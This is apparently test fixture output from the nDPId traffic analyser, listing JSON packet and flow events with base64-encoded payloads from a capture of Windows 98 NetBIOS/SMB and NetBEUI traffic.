00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576409807597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576409807597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADlJAAAAIARtTXAqO+BwKjv\/wCKAIoA0Qn+EQIADMCo74EAigC7AAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576409807597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576409807597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADlJAAAAIARtTXAqO+BwKjv\/wCKAIoA0Qn+EQIADMCo74EAigC7AAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"}
00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811132} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811132}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811517} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811517}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":45,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":45,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811901} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":45,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811901}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":46,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":46,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409812669} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":46,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409812669}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":47,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":47,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":47,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409813829} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":47,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409813829}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":48,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":48,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":48,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409815308} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":48,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409815308}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":49,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":49,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":49,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409817241} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":49,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409817241}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":50,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":50,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409819547} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":50,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409819547}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":51,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":51,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409822253} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":51,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409822253}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":52,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":52,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409825334} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":52,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409825334}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":53,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":53,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":53,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409828857} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":53,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409828857}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":54,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":54,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":54,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409832716} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":54,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409832716}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":55,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":55,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409836953} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":55,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409836953}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":56,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAQAAAAAAAQACo2haC8B0A+lo+\/82xHHoVEVTVDEgICAgICAgICAgAA=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":56,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAQAAAAAAAQACo2haC8B0A+lo+\/82xHHoVEVTVDEgICAgICAgICAgAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":56,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409844797} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":56,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409844797}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":57,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAgAA=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":57,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAAAAAAAAAgAEuP7\/UOih91uNRuQWUOhaV09SS0dST1VQICAgICAgAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":57,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409844798} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":57,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409844798}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":58,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAAAAAAAAAgACo2haC8B0A+lo+\/82xHHoV09SS0dST1VQICAgICAgAA=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAAAAAAAAAgACo2haC8B0A+lo+\/82xHHoV09SS0dST1VQICAgICAgAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":58,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845301} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":58,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409845301}
00382{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":59,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAQAAAAAAAQAEuP7\/UOih91uNRuQWUOhaVEVTVDEgICAgICAgICAgAA=="} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":59,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AwAAAAABAAwp1HmyAC\/w8AMsAP\/vAQAAAAAAAQAEuP7\/UOih91uNRuQWUOhaVEVTVDEgICAgICAgICAgAA=="}
